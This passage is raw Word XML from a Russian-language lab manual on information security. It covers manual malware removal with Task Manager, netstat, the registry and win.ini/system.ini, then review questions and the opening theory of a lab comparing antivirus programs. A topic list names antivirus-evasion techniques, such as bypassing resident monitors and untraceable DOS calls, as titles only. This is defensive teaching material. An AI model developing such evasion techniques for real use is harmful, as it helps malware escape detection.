          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="44"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вание антивирусного программного обеспечения в подавляющем большинстве случаев не допустит активации вредоносной программы на компьютере.</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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Запустите, Диспетчер задач Windows и проанализируйте список з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пущенных процессов, нагрузку, которую они оказывают на ЦП. Запишите в протокол лабораторной работы название подозрительных процессов. Объясн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>те, на основании чего были сделаны такие выводы.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:cr/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Используя, Диспетчер задач Windows выгрузите подозрительные проце</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Запустите интерфейс командной строки Windows. Ознакомьтесь с ключами команды netstat. Получите статистку текущих сетевых подключений Вашего компьютера с параметрами отображение всех подключений и ожида</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щих портов, отображение последовательности компонентов участвующих в с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>здании подключения, отображение исполняемого файла, участвующего в с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>здании каждого подключения, или слушающего порт. Сохраните статистику в файл с названием netstat.log. Запишите протокол лабораторной работы формат команды для этого действия. Проанализируйте данные netstat.log. Запишите в протокол лабораторной работы подозрительные открытые порты и приложения их использующие. Объясните, на основании чего были сделаны такие выводы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Запустите утилиту работы с реестром Windows. Проанализируйте содержимое перечисленных в теоретической части веток и ключей реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> При необходимости внесите изменения в параметры ключей с ц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лью удалить подозрительные записи, созданные вредоносной программой. З</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пишите в протокол лабораторной работы все внесенные изменения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Проанализируйте содержание файла win.ini на предмет подозр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тельных записей. При необходимости внесите корректировки в файл win.ini. Запишите в протокол лабораторной работы вносимые корректировки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Проанализируйте файл system.ini на предмет подозрительных зап</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сей. При необходимости внесите корректировки в файл system.ini. Запишите в протокол лабораторной работы вносимые корректировки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Используя стандартные средства поиска, найдите файлы, которые порождали подозрительные процессы и удалите их. Запишите в протокол лаб</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>раторной работы имена этих файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> Перегрузите компьютер, выполните пункты 1-6, чтобы убедиться, что удаление вредоносной программы прошло успешно, в оперативной памяти нет подозрительных процессов, ключи реестра не изменились, на компьютере отсутствуют подозрительно открытые порты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. Контрольные вопросы и задания </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>к занятию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>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D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Объясните в чем разница между шифрованным и полиморфным в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>русом?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Достаточно ли для защиты от заражения вредоносной программой установить файлам разрешения только для чтения? Обоснуйте ответ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00D86726" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Объясните в чем отличие понятий вирус и вредоносная программа?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>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Default="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Обход резидентных антивирусных мониторов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Методы трассировки и предопределенных адресов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Борьба с антивирусными мониторами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Конструирование неотслеживаемого обращения к DOS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="141" w:name="_Toc503720809"/>
      <w:bookmarkStart w:id="142" w:name="_Toc3811339"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа 19</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Сравнительный анализ анализ антивиру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>ных программ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ХАРАКТЕРИСТИКА КОМПЬЮТЕРНЫХ ВИРУСОВ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сущность и проявление компьютерных вирусов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Массовое применение персональных компьютеров, к сожалению, оказ</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>лось связанным с появлением самовоспроизводящихся программ-вирусов, пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>пятствующих нормальной работе компьютера, разрушающих файловую стру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>туру дисков и наносящих ущерб хранимой в компьютере информации. Прони</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>нув в один компьютер, компьютерный вирус способен распространиться на другие компьютеры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Компьютерным вирусом </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>называется специально написанная программа, способная самопроизвольно присоединяться к другим программам, создавать свои копии и внедрять их в файлы, системные области компьютера и в вычи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>лительные сети с целью нарушения работы программ, порчи файлов и катал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>гов, создания всевозможных помех в работе на компьютере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Причины появления и распространения компьютерных вирусов, с одной стороны, скрываются в психологии человеческой личности и ее теневых стор</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>нах (зависти, мести, тщеславии непризнанных творцов, невозможности ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>структивно применить свои способности), с другой стороны, обусловлены о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>сутствием аппаратных средств защиты и противодействия со стороны операц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>онной системы персонального компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Несмотря на принятые во многих странах законы о борьбе с компьюте</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ными преступлениями и разработку специальных программных средств защиты от вирусов, количество новых программных вирусов постоянно растет. Это требует от пользователя персонального компьютера знаний о природе вирусов, способах заражения вирусами и защиты от них.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Основными путями проникновения вирусов в компьютер являются съе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ные диски (гибкие и лазерные), а также компьютерные сети. Заражение жестк</w:t>
      </w:r>
